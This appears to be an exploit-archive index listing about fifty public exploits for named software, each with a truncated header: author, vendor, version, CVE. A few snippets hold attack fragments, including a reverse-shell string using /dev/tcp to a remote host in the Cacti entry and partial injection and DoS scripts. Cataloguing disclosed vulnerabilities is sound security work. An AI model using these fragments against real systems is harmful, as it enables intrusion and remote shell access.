ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting XSS Date: 12/09/2022 Exploit Author: Rob, CTRL Group Vendor Homepage: marigroup.com Version: V3.3.3 and under Tested on: Windows IIS all versions CVE : CVE-2022-35543 “Stored Cross-Site Scripting” Vulnerability within the Elsi...

Apache 2.4.x - Buffer Overflow

Exploit Title: Apache 2.4.x - Buffer Overflow Date: Jan 2 2023 Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS...

AD Manager Plus 7122 - Remote Code Execution (RCE)

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

Senayan Library Management System v9.0.0 - SQL Injection

Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection Author: nu11secur1ty Date: 11.09.2022 Vendor: https://slims.web.id/web/ Software: https://github.com/slims/slims9bulian/releases/download/v9.0.0/slims9bulian-9.0.0.zip Reference:...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

Cacti v1.2.22 - Remote Command Execution (RCE)

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

SOUND4 Server Service 4.1.102 - Local Privilege Escalation

Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 4.1.102 Summary: SOUND4 Windows Server Service. Desc: The application suffers from an unquot...

Judging Management System v1.0 - Remote Code Execution (RCE)

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Date: 12/11/2022 Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.ht...

CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path

Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path Date: 11/17/2022 Exploit Author: Damian Semon Jr Blue Team Alpha Version: 1.8.5 Vendor Homepage: https://masterplus.coolermaster.com/ Software Link: https://masterplus.coolermaster.com/ Tested on: Windows 10 64x Step...

ASKEY RTF3505VW-N1 - Privilege Escalation

Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation Date: 07-12-2022 Exploit Author: Leonardo Nicolas Servalli Vendor Homepage: www.askey.com Platform: ASKEY router devices RTF3505VW-N1 Tested on: Firmware BRSVg000R3505VMN1001s327 Vulnerability analysis:...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versi...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass IDOR Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versio...

rconfig 3.9.7 - Sql Injection (Authenticated)

Exploit Title: rconfig 3.9.7 - Sql Injection Authenticated Exploit Author: azhen Date: 10/12/2022 Vendor Homepage: https://www.rconfig.com/ Software Link: https://www.rconfig.com/ Vendor: rConfig Version: " sys.exit1 host=sys.argv1 Enter the hostname def getdatahost: print"+ Get db data..." vulur...

Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.bludit.com/ Version : 3-14-1 Tested on: windows 11 wampserver | Kali linux Category: WebApp Google Dork: intext:'2022...

qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)

Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Date: 2022-12-04 Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE:...

Spitfire CMS 1.0.475 - PHP Object Injection

Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection Exploit Author: LiquidWorm Vendor: Claus Muus Product web page: http://spitfire.clausmuus.de Affected version: 1.0.475 Summary: Spitfire is a system to manage the content of webpages. Desc: The application is prone to a PHP Object Injecti...

EQ Enterprise management system v2.2.0 - SQL Injection

Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection Date: 2022.12.7 Exploit Author: TLF Vendor Homepage: https://www.yiquantech.com/pc/about.html Software Link漏洞影响应用下载链接:...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15...

Judging Management System v1.0 - Authentication Bypass

Exploit Title: Judging Management System v1.0 - Authentication Bypass Date: 12/11/2022 Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html...

Bangresto 1.0 - SQL Injection

Exploit Title: Bangresto 1.0 - SQL Injection Exploit Author: nu11secur1ty Date: 12.16.2022 Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html Demo: https://axcora.my.id/bangrestoapp/start.php Software: https://github.com/mesinkasir/bangresto...

WooCommerce v7.1.0 - Remote Code Execution(RCE)

Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code ExecutionRCE Date: 2022-12-07 Author: Milad Karimi Vendor Homepage: https://wordpress.org/plugins/woocommerce Software Link: https://wordpress.org/plugins/woocommerce Tested on: windows 10 , firefox Version: 7.1.0 CVE : N/A Description:...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

ProLink PRS1841 PLDT Home fiber - Default Password

Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber Date: 12/8/2022 Exploit Author: Lawrence Amer @zux0x3a Vendor Homepage: https://prolink2u.com/product/prs1841/ Firmware : PRS1841 U V2 research:...

Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Textpattern 4.8.8 - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://textpattern.com/ Version : 4.8.8 Tested on: windows 11 xammp | Kali linux Category: WebApp Google Dork: intext:"Published with Textpattern...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service DoS Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

LISTSERV 17 - Insecure Direct Object Reference (IDOR)

Exploit Title: LISTSERV 17 - Insecure Direct Object Reference IDOR Google Dork: inurl:/scripts/wa.exe Date: 12/02/2022 Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019...

Virtual Reception v1.0 - Web Server Directory Traversal

Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal Exploit Author: Spinae Vendor Homepage: https://www.virtualreception.nl/ Version: win7sp1rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY Tested on: all CVE-ID: CVE-2023-25289 We discovered the web server of the...

Concrete5 CME v9.1.3 - Xpath injection

Exploit Title: Concrete5 CME v9.1.3 - Xpath injection Author: nu11secur1ty Date: 11.28.2022 Vendor: https://www.concretecms.org/ Software: https://www.concretecms.org/download Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3...

ClicShopping v3.402 - Cross-Site Scripting (XSS)

Title: ClicShopping v3.402 - Cross-Site Scripting XSS Author: nu11secur1ty Date: 11.20.2022 Vendor: https://www.clicshopping.org/forum/ Software: https://github.com/ClicShopping/ClicShoppingV3/releases/tag/version3402 Reference:...

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)

Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting XSS Google Dork: N/A Date: 12/6/2022 Exploit Author: @casp3r0x0 hassan ali al-khafaji Vendor Homepage: https://www.eve-ng.net/ Software Link: https://www.eve-ng.net/index.php/download/ Version: Free EVE Community Edition Version 5.0.1-1...

Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting XSS Exploit Author: Andrey Stoykov Software Link: https://github.com/Shoplazza/LifeStyle Version: 1.1 Tested on: Ubuntu 20.04 Stored XSS 1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" - "Manage...

4images 1.9 - Remote Command Execution (RCE)

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

Router ZTE-H108NS - Stack Buffer Overflow (DoS)

Exploit Title: ZTE-H108NS - Stack Buffer Overflow DoS Date: 19-11-2022 Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 Usage: python zte-exploit.py CVE: N/A Tested on: Debian 5.18.5 !/usr/bin/python3 import sys import socket from time impor...

Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)

Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution RCE Date: 02-12-22 Exploit Author: 0xEF Vendor Homepage: https://www.audiocodes.com Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637 Version: = 7.8.20002.47752 Tested on: Windows 10 &...

Ecommerse v1.0 - Cross-Site Scripting (XSS)

Title: Ecommerse v1.0 - Cross-Site Scripting XSS Author: nu11secur1ty Date: 11.23.2022 Vendor: https://github.com/winston-dsouza Software: https://github.com/winston-dsouza/ecommerce-website Reference:...

myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)

Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting XSS Exploit Author: Andrey Stoykov Software Link: https://mybb.com/versions/1.8.26/ Version: 1.8.26 Tested on: Ubuntu 20.04 Stored XSS 1: To reproduce do the following: 1. Login as administrator user 2. Browse to "Templates and Style...

CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token

Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Date: 30/11/2022 Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi Deda Cloud Cybersecurity Team Vendor Homepage: https://www.crowdstrike.com/ Author Homepage...

Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path

Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Author: P4p4 M4n3 Discovery Date: 25-11-2022 Vendor Homepage: https://webcompanion.com/en/ Version 4.1.0.409 Tested on: Microsoft Windows Server 2019 Datacenter x64 Description: Lavasoft 4.1.0.409 install...

LISTSERV 17 - Reflected Cross Site Scripting (XSS)

Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting XSS Google Dork: inurl:/scripts/wa.exe Date: 12/01/2022 Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CV...

Dreamer CMS v4.0.0 - SQL Injection

Exploit Title: Dreamer CMS v4.0.0 - SQL Injection Date: 2022/10/02 Exploit Author: lvren Vendor Homepage: http://cms.iteachyou.cc/ Software Link: https://gitee.com/isoftforce/dreamercms/repository/archive/v4.0.0.zip Version: v4.0.0 CVE: CVE-2022-43128 Proof Of Concept: POST /admin/search/doSearch...

Zillya Total Security 3.0.2367.0 - Local Privilege Escalation

Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation Date: 02.12.2022 Author: M. Akil Gündoğan Contact: https://twitter.com/akilgundogan Vendor Homepage: https://zillya.com/ Software Link: https://download.zillya.com/ZTS3.exe / https://download.zillya.com/ZIS3.exe Version:...

Covenant v0.5 - Remote Code Execution (RCE)

Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...

Boa Web Server v0.94.14 - Authentication Bypass

Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass Date: 19-11-2022 Exploit Author: George Tsimpidas Vendor: https://github.com/gpg/boa CVE: N/A Tested on: Debian 5.18.5 Description : Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the correct security constraint on th...

WPForms 1.7.8 - Cross-Site Scripting (XSS)

Exploit Title: WPForms 1.7.8 - Cross-Site Scripting XSS Date: 2022-12-05 Author: Milad karimi Software Link: https://wordpress.org/plugins/wpforms-lite Version: 1.7.8 Tested on: Windows 10 CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature...

Router ZTE-H108NS - Authentication Bypass

Exploit Title: Router ZTE-H108NS - Authentication Bypass Date: 19-11-2022 Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 CVE: N/A Tested on: Debian 5.18.5 Description : When specific http methods are listed within a security constraint, th...

DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure

Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Date: 2022-11-10 Exploit Author: Aryan Chehreghani Vendor Homepage: https://www.dlink.com Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 Firmware Version: ME1.00 Tested on:...

WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: WP All Import v3.6.7 - Remote Code Execution RCE Authenticated Date: 11/05/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://www.wpallimport.com/ Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ scroll down to select the...

Human Resource Management System 1.0 - SQL Injection (unauthenticated)

Exploit Title: Human Resource Management System - SQL Injection unauthenticated Date: 08-11-2022 Exploit Author: Matthijs van der Vaart eMVee Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html Software Link:...

Revenue Collection System v1.0 - Remote Code Execution (RCE)

Exploit Title: Revenue Collection System v1.0 - Remote Code Execution RCE Exploit Author: Joe Pollock Date: November 16, 2022 Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip...